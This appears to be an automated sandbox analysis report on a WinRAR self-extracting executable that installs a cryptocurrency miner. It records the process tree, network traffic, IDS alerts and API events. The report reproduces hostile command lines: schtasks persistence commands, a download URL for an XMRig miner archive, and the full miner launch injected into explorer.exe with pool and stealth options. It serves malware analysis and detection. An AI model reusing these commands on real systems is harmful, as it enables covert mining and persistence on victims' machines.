Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 4, 2021, 3:23 p.m.	Nov. 4, 2021, 3:29 p.m.

Size	3.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`8b1011bf4b9dc38d8aececd4ed9e11c6`
SHA256	`5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2`
CRC32	`15C1AEF4`
ssdeep	`98304:20NgMZkh23T8LiWi0agFmX/Hgj+Tig1PfSxl8w3WZCzK:9gmf3weWHvFifIRwX6fru`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
2412
- f1_prot.exe "C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe"
  2524
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
    2704
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
      2764
  - services64.exe "C:\Users\test22\AppData\Local\Temp\services64.exe"
    2872
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
      3044
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
        2144
    - sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2552
    - explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
      2796
- f2_prot.exe "C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe"
  2948
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
    2372
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'
      2188
  - services32.exe "C:\Users\test22\AppData\Local\Temp\services32.exe"
    2480
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
      1604
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'
        3060
    - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
      2616
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
raw.githubusercontent.com	A 185.199.109.133 A 185.199.111.133 A 185.199.110.133 A 185.199.108.133	185.199.110.133
prohashing.com	A 50.220.121.209	50.220.121.209
sanctam.net
github.com	A 15.164.81.167	15.164.81.167

IP Address	Status	Action
15.164.81.167	Active	Moloch
164.124.101.2	Active	Moloch
185.199.108.133	Active	Moloch
50.220.121.209	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49180 -> 15.164.81.167:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 185.199.108.133:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 50.220.121.209:3359	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49180 15.164.81.167:443	C=US, O=DigiCert, Inc., CN=DigiCert High Assurance TLS Hybrid ECC SHA256 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	84:63:b3:a9:29:12:cc:fd:1d:31:47:05:98:9b:ec:13:99:37:d0:d7
TLS 1.2 192.168.56.103:49181 185.199.108.133:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=www.github.com	70:94:de:dd:e6:c4:69:48:3a:92:70:a1:48:56:78:2d:18:64:e0:b7

Queries for the computername (33 events)

Time & API	Arguments	Status	Return
GetComputerNameA Nov. 4, 2021, 3:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 4, 2021, 3:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 4, 2021, 3:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 3:28 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (12 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 4, 2021, 3:23 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:23 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:27 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:27 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:27 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:27 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 3:28 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 4, 2021, 3:16 p.m.	buffer: SUCCESS: The scheduled task "services64" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 4, 2021, 3:27 p.m.	buffer: SUCCESS: The scheduled task "services64" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 4, 2021, 3:27 p.m.	buffer: SUCCESS: The scheduled task "services32" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 4, 2021, 3:28 p.m.	buffer: SUCCESS: The scheduled task "services32" has successfully been created. console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 4, 2021, 3:23 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
suspicious_features	GET method with no useragent header				suspicious_request	GET https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip

Performs some HTTP requests (2 events)

request	GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
request	GET https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip

Allocates read-write-execute memory (usually to unpack itself) (50 out of 390 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dd0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076de0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076df0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e60000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076e90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076ea0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076eb0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013f560000 process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002df0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002f00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002f80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae1000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef317b000 process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003250000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae2000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae4000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae4000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae4000 process_handle: 0xffffffffffffffff	1	0
NtProtectVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2ae4000 process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1	0
NtAllocateVirtualMemory Nov. 4, 2021, 3:23 p.m.	process_identifier: 2524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Nov. 4, 2021, 3:28 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 10232369152 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Creates a suspicious process (6 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Executes one or more WMI queries (1 event)

wmi	Select CommandLine from Win32_Process where Name='explorer.exe'

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
